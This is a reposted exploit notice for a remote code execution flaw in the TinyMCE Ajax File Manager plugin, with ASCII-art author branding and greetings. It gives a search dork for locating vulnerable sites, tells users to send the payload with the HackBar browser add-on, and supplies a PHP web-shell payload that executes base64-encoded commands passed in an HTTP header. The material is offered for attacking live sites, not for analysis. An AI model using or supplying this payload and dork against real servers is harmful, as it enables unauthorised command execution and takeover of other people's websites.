TinyMCE Ajax File Manager suffers from a remote code execution vulnerability.

更新时间：2022-09-10 23:11:48

 ____   ____   ____   _______/  |________   ____   ____ 
 /  _ \ /    \_/ __ \ /  ___/\   __\_  __ \_/ __ \_/ __ \
(  <_> )   |  \  ___/ \___ \  |  |  |  | \/\  ___/\  ___/
 \____/|___|  /\___  >____  > |_ |  |__|    \___  >\___  >
            \/     \/     \/                    \/     \/
      
 
# Exploit Title : timynce Ajax File Manager Remote Code 
# Author        : By onestree
# Software Link : http://www.phpletter.com/Demo/Tinymce-Ajax-File-Manager/
# tested        : windows 7
# Dork          : inurl:"/plugins/filemanager/" or inurl:'/timynce/plugins/"
 
 
*************************************************************
 
how to run the exploit use firefox web browser
and download firefox add ons HackBar

exploit : 

foo=<?php error_reporting(0);print(system('onestree'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>

 ====================================================================

tutorial video 
https://www.***.com/watch?v=ahli-dehYWY


Thanks :
 
  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
      
          indonesiancoder - moeslimh4x0r - go-coder
 
spesial my hunny ( Fheby Yahya) :* muaaah

上一篇 : ：Linux Kernel open-time Capability file_ns_capable() Privilege Escalation下一篇 : Preventing XSS with Content Security Policy

TinyMCE Ajax File Manager suffers from a remote code execution vulnerability.

相关阅读

推荐文章